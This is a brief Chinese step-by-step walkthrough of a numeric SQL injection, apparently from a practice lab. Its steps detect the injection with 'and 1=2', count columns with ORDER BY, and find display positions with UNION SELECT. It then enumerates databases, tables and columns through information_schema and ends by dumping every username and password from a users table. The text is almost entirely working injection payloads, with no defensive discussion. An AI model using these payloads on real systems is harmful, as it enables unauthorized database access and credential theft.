1.初始状态:
2.输入?id=1:
3.输入?id=1 and 1=2--+发生变化如下,故判断为数字型注入:
4.猜测字段数:
?id=1 order by 4--+处开始发生错误,故而判断字段数为3
5.联合查询获取显示位:
?id=-1 union select 1,2,3--+
6.获取数据库:
当前:
?id=-1 union select 1,database(),3--+
所有:
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
7.获取当前数据表名:
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
8.获取当前数据库中user表所有字段:
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
9.大功告成,获取该表中字段内容:
?id=-1 union select 1,group_concat(username),group_concat(password) from users--+